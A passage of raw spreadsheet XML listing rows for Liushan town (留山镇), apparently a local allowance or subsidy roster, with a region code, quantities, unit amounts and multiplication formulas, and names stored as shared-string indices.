      <c r="I1199" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1199" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1199" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1200" customHeight="1" spans="1:11">
      <c r="A1200" s="23" t="s">
        <v>3221</v>
      </c>
      <c r="B1200" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1200" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1200" s="24" t="s">
        <v>3222</v>
      </c>
      <c r="E1200" s="24" t="s">
        <v>3209</v>
      </c>
      <c r="F1200" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1200" s="24">
        <v>1</v>
      </c>
      <c r="H1200" s="25">
        <v>365</v>
      </c>
      <c r="I1200" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1200" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1200" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1201" customHeight="1" spans="1:11">
      <c r="A1201" s="23" t="s">
        <v>3223</v>
      </c>
      <c r="B1201" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1201" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1201" s="24" t="s">
        <v>3224</v>
      </c>
      <c r="E1201" s="24" t="s">
        <v>3225</v>
      </c>
      <c r="F1201" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1201" s="24">
        <v>2</v>
      </c>
      <c r="H1201" s="25">
        <v>325</v>
      </c>
      <c r="I1201" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1201" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1201" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1202" customHeight="1" spans="1:11">
      <c r="A1202" s="23" t="s">
        <v>3226</v>
      </c>
      <c r="B1202" s="24" t="str">
        <f>B1201</f>
        <v>留山镇</v>
      </c>
      <c r="C1202" s="24" t="str">
        <f>C1201</f>
        <v>留山镇</v>
      </c>
      <c r="D1202" s="23" t="s">
        <v>3227</v>
      </c>
      <c r="E1202" s="23" t="s">
        <v>3228</v>
      </c>
      <c r="F1202" s="24">
        <f>F1201</f>
        <v>4113210399</v>
      </c>
      <c r="G1202" s="24"/>
      <c r="H1202" s="24"/>
      <c r="I1202" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1202" s="24"/>
      <c r="K1202" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1203" customHeight="1" spans="1:11">
      <c r="A1203" s="23" t="s">
        <v>3229</v>
      </c>
      <c r="B1203" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1203" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1203" s="24" t="s">
        <v>3230</v>
      </c>
      <c r="E1203" s="24" t="s">
        <v>3231</v>
      </c>
      <c r="F1203" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1203" s="24">
        <v>1</v>
      </c>
      <c r="H1203" s="25">
        <v>365</v>
      </c>
      <c r="I1203" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1203" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1203" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1204" customHeight="1" spans="1:11">
      <c r="A1204" s="23" t="s">
        <v>3232</v>
      </c>
      <c r="B1204" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1204" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1204" s="24" t="s">
        <v>3233</v>
      </c>
      <c r="E1204" s="24" t="s">
        <v>3197</v>
      </c>
      <c r="F1204" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1204" s="24">
        <v>1</v>
      </c>
      <c r="H1204" s="25">
        <v>365</v>
      </c>
      <c r="I1204" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1204" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1204" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1205" customHeight="1" spans="1:11">
      <c r="A1205" s="23" t="s">
        <v>3234</v>
      </c>
      <c r="B1205" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1205" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1205" s="24" t="s">
        <v>3235</v>
      </c>
      <c r="E1205" s="24" t="s">
        <v>3236</v>
      </c>
      <c r="F1205" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1205" s="24">
        <v>2</v>
      </c>
      <c r="H1205" s="25">
        <v>345</v>
      </c>
      <c r="I1205" s="24">
        <f t="shared" si="18"/>
        <v>690</v>
      </c>
      <c r="J1205" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1205" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1206" customHeight="1" spans="1:11">
      <c r="A1206" s="23" t="s">
        <v>3237</v>
      </c>
      <c r="B1206" s="24" t="str">
        <f>B1205</f>
        <v>留山镇</v>
      </c>
      <c r="C1206" s="24" t="str">
        <f>C1205</f>
        <v>留山镇</v>
      </c>
      <c r="D1206" s="23" t="s">
        <v>3238</v>
      </c>
      <c r="E1206" s="23" t="s">
        <v>3239</v>
      </c>
      <c r="F1206" s="24">
        <f>F1205</f>
        <v>4113210399</v>
      </c>
      <c r="G1206" s="24"/>
      <c r="H1206" s="24"/>
      <c r="I1206" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1206" s="24"/>
      <c r="K1206" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1207" customHeight="1" spans="1:11">
      <c r="A1207" s="23" t="s">
        <v>3240</v>
      </c>
      <c r="B1207" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1207" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1207" s="24" t="s">
        <v>3241</v>
      </c>
      <c r="E1207" s="24" t="s">
        <v>3242</v>
      </c>
      <c r="F1207" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1207" s="24">
        <v>1</v>
      </c>
      <c r="H1207" s="25">
        <v>365</v>
      </c>
      <c r="I1207" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1207" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1207" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1208" customHeight="1" spans="1:11">
      <c r="A1208" s="23" t="s">
        <v>3243</v>
      </c>
      <c r="B1208" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1208" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1208" s="24" t="s">
        <v>3244</v>
      </c>
      <c r="E1208" s="24" t="s">
        <v>3245</v>
      </c>
      <c r="F1208" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1208" s="24">
        <v>1</v>
      </c>
      <c r="H1208" s="25">
        <v>365</v>
      </c>
      <c r="I1208" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1208" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1208" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1209" customHeight="1" spans="1:11">
      <c r="A1209" s="23" t="s">
        <v>3246</v>
      </c>
      <c r="B1209" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1209" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1209" s="24" t="s">
        <v>3247</v>
      </c>
      <c r="E1209" s="24" t="s">
        <v>3248</v>
      </c>
      <c r="F1209" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1209" s="24">
        <v>2</v>
      </c>
      <c r="H1209" s="25">
        <v>325</v>
      </c>
      <c r="I1209" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1209" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1209" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1210" customHeight="1" spans="1:11">
      <c r="A1210" s="23" t="s">
        <v>3249</v>
      </c>
      <c r="B1210" s="24" t="str">
        <f>B1209</f>
        <v>留山镇</v>
      </c>
      <c r="C1210" s="24" t="str">
        <f>C1209</f>
        <v>留山镇</v>
      </c>
      <c r="D1210" s="49" t="s">
        <v>3250</v>
      </c>
      <c r="E1210" s="50" t="s">
        <v>3251</v>
      </c>
      <c r="F1210" s="24">
        <f>F1209</f>
        <v>4113210399</v>
      </c>
      <c r="G1210" s="24"/>
      <c r="H1210" s="24"/>
      <c r="I1210" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1210" s="24"/>
      <c r="K1210" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1211" customHeight="1" spans="1:11">
      <c r="A1211" s="23" t="s">
        <v>3252</v>
      </c>
      <c r="B1211" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1211" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1211" s="24" t="s">
        <v>3253</v>
      </c>
      <c r="E1211" s="24" t="s">
        <v>3254</v>
      </c>
      <c r="F1211" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1211" s="24">
        <v>2</v>
      </c>
      <c r="H1211" s="25">
        <v>325</v>
      </c>
      <c r="I1211" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1211" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1211" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1212" customHeight="1" spans="1:11">
      <c r="A1212" s="23" t="s">
        <v>3255</v>
      </c>
      <c r="B1212" s="24" t="str">
        <f>B1211</f>
        <v>留山镇</v>
      </c>
      <c r="C1212" s="24" t="str">
        <f>C1211</f>
        <v>留山镇</v>
      </c>
      <c r="D1212" s="23" t="s">
        <v>3256</v>
      </c>
      <c r="E1212" s="23" t="s">
        <v>3257</v>
      </c>
      <c r="F1212" s="24">
        <f>F1211</f>
        <v>4113210399</v>
      </c>
      <c r="G1212" s="24"/>
      <c r="H1212" s="24"/>
      <c r="I1212" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1212" s="24"/>
      <c r="K1212" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1213" customHeight="1" spans="1:11">
      <c r="A1213" s="23" t="s">
        <v>3258</v>
      </c>
      <c r="B1213" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1213" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1213" s="24" t="s">
        <v>3259</v>
      </c>
      <c r="E1213" s="24" t="s">
        <v>3260</v>
      </c>
      <c r="F1213" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1213" s="24">
        <v>2</v>
      </c>
      <c r="H1213" s="25">
        <v>325</v>
      </c>
      <c r="I1213" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1213" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1213" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1214" customHeight="1" spans="1:11">
      <c r="A1214" s="23" t="s">
        <v>3261</v>
      </c>
      <c r="B1214" s="24" t="str">
        <f>B1213</f>
        <v>留山镇</v>
      </c>
      <c r="C1214" s="24" t="str">
        <f>C1213</f>
        <v>留山镇</v>
      </c>
      <c r="D1214" s="23" t="s">
        <v>3262</v>
      </c>
      <c r="E1214" s="23" t="s">
        <v>3263</v>
      </c>
      <c r="F1214" s="24">
        <f>F1213</f>
        <v>4113210399</v>
      </c>
      <c r="G1214" s="24"/>
      <c r="H1214" s="24"/>
      <c r="I1214" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1214" s="24"/>
      <c r="K1214" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1215" customHeight="1" spans="1:11">
      <c r="A1215" s="23" t="s">
        <v>3264</v>
      </c>
      <c r="B1215" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1215" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1215" s="24" t="s">
        <v>3265</v>
      </c>
      <c r="E1215" s="24" t="s">
        <v>3266</v>
      </c>
      <c r="F1215" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1215" s="24">
        <v>2</v>
      </c>
      <c r="H1215" s="25">
        <v>325</v>
      </c>
      <c r="I1215" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1215" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1215" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1216" customHeight="1" spans="1:11">
      <c r="A1216" s="23" t="s">
        <v>3267</v>
      </c>
      <c r="B1216" s="24" t="str">
        <f>B1215</f>
        <v>留山镇</v>
      </c>
      <c r="C1216" s="24" t="str">
        <f>C1215</f>
        <v>留山镇</v>
      </c>
      <c r="D1216" s="23" t="s">
        <v>3268</v>
      </c>
      <c r="E1216" s="23" t="s">
        <v>3269</v>
      </c>
      <c r="F1216" s="24">
        <f>F1215</f>
        <v>4113210399</v>
      </c>
      <c r="G1216" s="24"/>
      <c r="H1216" s="24"/>
      <c r="I1216" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1216" s="24"/>
      <c r="K1216" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1217" customHeight="1" spans="1:11">
      <c r="A1217" s="23" t="s">
        <v>3270</v>
      </c>
      <c r="B1217" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1217" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1217" s="24" t="s">
        <v>3271</v>
      </c>
      <c r="E1217" s="24" t="s">
        <v>3272</v>
      </c>
      <c r="F1217" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1217" s="24">
        <v>2</v>
      </c>
      <c r="H1217" s="25">
        <v>325</v>
      </c>
      <c r="I1217" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1217" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1217" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1218" customHeight="1" spans="1:11">
      <c r="A1218" s="23" t="s">
        <v>3273</v>
      </c>
      <c r="B1218" s="24" t="str">
        <f>B1217</f>
        <v>留山镇</v>
      </c>
      <c r="C1218" s="24" t="str">
        <f>C1217</f>
        <v>留山镇</v>
      </c>
      <c r="D1218" s="23" t="s">
        <v>3274</v>
      </c>
      <c r="E1218" s="23" t="s">
        <v>3275</v>
      </c>
      <c r="F1218" s="24">
        <f>F1217</f>
        <v>4113210399</v>
      </c>
      <c r="G1218" s="24"/>
      <c r="H1218" s="24"/>
      <c r="I1218" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1218" s="24"/>
      <c r="K1218" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1219" customHeight="1" spans="1:11">
      <c r="A1219" s="23" t="s">
        <v>3276</v>
      </c>
      <c r="B1219" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1219" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1219" s="24" t="s">
        <v>3277</v>
      </c>
      <c r="E1219" s="24" t="s">
        <v>3278</v>
      </c>
      <c r="F1219" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1219" s="24">
        <v>2</v>
      </c>
      <c r="H1219" s="25">
        <v>325</v>
      </c>
      <c r="I1219" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1219" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1219" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1220" customHeight="1" spans="1:11">
      <c r="A1220" s="23" t="s">
        <v>3279</v>
      </c>
      <c r="B1220" s="24" t="str">
        <f>B1219</f>
        <v>留山镇</v>
      </c>
      <c r="C1220" s="24" t="str">
        <f>C1219</f>
        <v>留山镇</v>
      </c>
      <c r="D1220" s="23" t="s">
        <v>3280</v>
      </c>
      <c r="E1220" s="23" t="s">
        <v>3257</v>
      </c>
      <c r="F1220" s="24">
        <f>F1219</f>
        <v>4113210399</v>
      </c>
      <c r="G1220" s="24"/>
      <c r="H1220" s="24"/>
      <c r="I1220" s="24">
        <f t="shared" ref="I1220:I1283" si="19">H1220*G1220</f>
        <v>0</v>
      </c>
      <c r="J1220" s="24"/>
      <c r="K1220" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1221" customHeight="1" spans="1:11">
      <c r="A1221" s="23" t="s">
        <v>3281</v>
      </c>
      <c r="B1221" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1221" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1221" s="24" t="s">
        <v>3282</v>
      </c>
      <c r="E1221" s="24" t="s">
        <v>3260</v>
      </c>
      <c r="F1221" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1221" s="24">
        <v>1</v>
      </c>
      <c r="H1221" s="25">
        <v>365</v>
      </c>
      <c r="I1221" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1221" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1221" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1222" customHeight="1" spans="1:11">
      <c r="A1222" s="23" t="s">
        <v>3283</v>
      </c>
      <c r="B1222" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1222" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1222" s="24" t="s">
        <v>862</v>
      </c>
      <c r="E1222" s="24" t="s">
        <v>3197</v>
      </c>
      <c r="F1222" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1222" s="24">
        <v>1</v>
      </c>
      <c r="H1222" s="25">
        <v>365</v>
      </c>
      <c r="I1222" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1222" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1222" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1223" customHeight="1" spans="1:11">
      <c r="A1223" s="23" t="s">
        <v>3284</v>
      </c>
      <c r="B1223" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1223" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1223" s="24" t="s">
        <v>3285</v>
      </c>
      <c r="E1223" s="24" t="s">
        <v>3286</v>
      </c>
      <c r="F1223" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1223" s="24">
        <v>1</v>
      </c>
      <c r="H1223" s="25">
        <v>365</v>
      </c>
      <c r="I1223" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1223" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1223" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1224" customHeight="1" spans="1:11">
      <c r="A1224" s="23" t="s">
        <v>3287</v>
      </c>
      <c r="B1224" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1224" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1224" s="24" t="s">
        <v>3288</v>
      </c>
      <c r="E1224" s="24" t="s">
        <v>3289</v>
      </c>
      <c r="F1224" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1224" s="24">
        <v>2</v>
      </c>
      <c r="H1224" s="25">
        <v>325</v>
      </c>
      <c r="I1224" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1224" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1224" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1225" customHeight="1" spans="1:11">
      <c r="A1225" s="23" t="s">
        <v>3290</v>
      </c>
      <c r="B1225" s="24" t="str">
        <f>B1224</f>
        <v>留山镇</v>
      </c>
      <c r="C1225" s="24" t="str">
        <f>C1224</f>
        <v>留山镇</v>
      </c>
      <c r="D1225" s="23" t="s">
        <v>3291</v>
      </c>
      <c r="E1225" s="23" t="s">
        <v>2472</v>
      </c>
      <c r="F1225" s="24">
        <f>F1224</f>
        <v>4113210399</v>
      </c>
      <c r="G1225" s="24"/>
      <c r="H1225" s="24"/>
      <c r="I1225" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1225" s="24"/>
      <c r="K1225" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1226" customHeight="1" spans="1:11">
      <c r="A1226" s="23" t="s">
        <v>3292</v>
      </c>
      <c r="B1226" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1226" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1226" s="24" t="s">
        <v>3293</v>
      </c>
      <c r="E1226" s="24" t="s">
        <v>3294</v>
      </c>
      <c r="F1226" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1226" s="24">
        <v>2</v>
      </c>
      <c r="H1226" s="25">
        <v>325</v>
      </c>
      <c r="I1226" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1226" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1226" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1227" customHeight="1" spans="1:11">
      <c r="A1227" s="23" t="s">
        <v>3295</v>
      </c>
      <c r="B1227" s="24" t="str">
        <f>B1226</f>
        <v>留山镇</v>
      </c>
      <c r="C1227" s="24" t="str">
        <f>C1226</f>
        <v>留山镇</v>
      </c>
      <c r="D1227" s="23" t="s">
        <v>3296</v>
      </c>
      <c r="E1227" s="23" t="s">
        <v>3297</v>
      </c>
      <c r="F1227" s="24">
        <f>F1226</f>
        <v>4113210399</v>
      </c>
      <c r="G1227" s="24"/>
      <c r="H1227" s="24"/>
      <c r="I1227" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1227" s="24"/>
      <c r="K1227" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1228" customHeight="1" spans="1:11">
      <c r="A1228" s="23" t="s">
        <v>3298</v>
      </c>
      <c r="B1228" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1228" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1228" s="24" t="s">
        <v>3299</v>
      </c>
      <c r="E1228" s="24" t="s">
        <v>3300</v>
      </c>
      <c r="F1228" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1228" s="24">
        <v>2</v>
      </c>
      <c r="H1228" s="25">
        <v>325</v>
      </c>
      <c r="I1228" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1228" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1228" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1229" customHeight="1" spans="1:11">
      <c r="A1229" s="23" t="s">
        <v>3301</v>
      </c>
      <c r="B1229" s="24" t="str">
        <f>B1228</f>
        <v>留山镇</v>
      </c>
      <c r="C1229" s="24" t="str">
        <f>C1228</f>
        <v>留山镇</v>
      </c>
      <c r="D1229" s="23" t="s">
        <v>3302</v>
      </c>
      <c r="E1229" s="23" t="s">
        <v>3303</v>
      </c>
      <c r="F1229" s="24">
        <f>F1228</f>
        <v>4113210399</v>
      </c>
      <c r="G1229" s="24"/>
      <c r="H1229" s="24"/>
      <c r="I1229" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1229" s="24"/>
      <c r="K1229" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1230" customHeight="1" spans="1:11">
      <c r="A1230" s="23" t="s">
        <v>3304</v>
      </c>
      <c r="B1230" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1230" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1230" s="24" t="s">
        <v>3305</v>
      </c>
      <c r="E1230" s="24" t="s">
        <v>3245</v>
      </c>
      <c r="F1230" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1230" s="24">
        <v>2</v>
      </c>
      <c r="H1230" s="25">
        <v>325</v>
      </c>
      <c r="I1230" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1230" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1230" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1231" customHeight="1" spans="1:11">
      <c r="A1231" s="23" t="s">
        <v>3306</v>
      </c>
      <c r="B1231" s="24" t="str">
        <f>B1230</f>
        <v>留山镇</v>
      </c>
      <c r="C1231" s="24" t="str">
        <f>C1230</f>
        <v>留山镇</v>
      </c>
      <c r="D1231" s="23" t="s">
        <v>3307</v>
      </c>
      <c r="E1231" s="23" t="s">
        <v>3300</v>
      </c>
      <c r="F1231" s="24">
        <f>F1230</f>
        <v>4113210399</v>
      </c>
      <c r="G1231" s="24"/>
      <c r="H1231" s="24"/>
      <c r="I1231" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1231" s="24"/>
      <c r="K1231" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1232" customHeight="1" spans="1:11">
      <c r="A1232" s="23" t="s">
        <v>3308</v>
      </c>
      <c r="B1232" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1232" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1232" s="24" t="s">
        <v>3309</v>
      </c>
      <c r="E1232" s="24" t="s">
        <v>3254</v>
      </c>
      <c r="F1232" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1232" s="24">
        <v>1</v>
      </c>
      <c r="H1232" s="25">
        <v>365</v>
      </c>
      <c r="I1232" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1232" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1232" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1233" customHeight="1" spans="1:11">
      <c r="A1233" s="23" t="s">
        <v>3310</v>
      </c>
      <c r="B1233" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1233" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1233" s="24" t="s">
        <v>3311</v>
      </c>
      <c r="E1233" s="24" t="s">
        <v>3215</v>
      </c>
      <c r="F1233" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1233" s="24">
        <v>1</v>
      </c>
      <c r="H1233" s="25">
        <v>365</v>
      </c>
      <c r="I1233" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1233" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1233" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1234" customHeight="1" spans="1:11">
      <c r="A1234" s="23" t="s">
        <v>3312</v>
      </c>
      <c r="B1234" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1234" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1234" s="24" t="s">
        <v>3313</v>
      </c>
      <c r="E1234" s="24" t="s">
        <v>3314</v>
      </c>
      <c r="F1234" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1234" s="24">
        <v>1</v>
      </c>
      <c r="H1234" s="25">
        <v>365</v>
      </c>
      <c r="I1234" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1234" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1234" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1235" customHeight="1" spans="1:11">
      <c r="A1235" s="23" t="s">
        <v>3315</v>
      </c>
      <c r="B1235" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1235" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1235" s="24" t="s">
        <v>3316</v>
      </c>
      <c r="E1235" s="24" t="s">
        <v>3317</v>
      </c>
      <c r="F1235" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1235" s="24">
        <v>1</v>
      </c>
      <c r="H1235" s="25">
        <v>365</v>
      </c>
      <c r="I1235" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1235" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1235" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1236" customHeight="1" spans="1:11">
      <c r="A1236" s="23" t="s">
        <v>3318</v>
      </c>
      <c r="B1236" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1236" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1236" s="24" t="s">
        <v>3319</v>
      </c>
      <c r="E1236" s="24" t="s">
        <v>3320</v>
      </c>
      <c r="F1236" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1236" s="24">
        <v>2</v>
      </c>
      <c r="H1236" s="25">
        <v>325</v>
      </c>
      <c r="I1236" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1236" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1236" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1237" customHeight="1" spans="1:11">
      <c r="A1237" s="23" t="s">
        <v>3321</v>
      </c>
      <c r="B1237" s="24" t="str">
        <f>B1236</f>
        <v>留山镇</v>
      </c>
      <c r="C1237" s="24" t="str">
        <f>C1236</f>
        <v>留山镇</v>
      </c>
      <c r="D1237" s="23" t="s">
        <v>3322</v>
      </c>
      <c r="E1237" s="23" t="s">
        <v>3206</v>
      </c>
      <c r="F1237" s="24">
        <f>F1236</f>
        <v>4113210399</v>
      </c>
      <c r="G1237" s="24"/>
      <c r="H1237" s="24"/>
      <c r="I1237" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1237" s="24"/>
      <c r="K1237" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1238" customHeight="1" spans="1:11">
      <c r="A1238" s="23" t="s">
        <v>3323</v>
      </c>
      <c r="B1238" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1238" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1238" s="24" t="s">
        <v>3324</v>
      </c>
      <c r="E1238" s="24" t="s">
        <v>3325</v>
      </c>
      <c r="F1238" s="24">
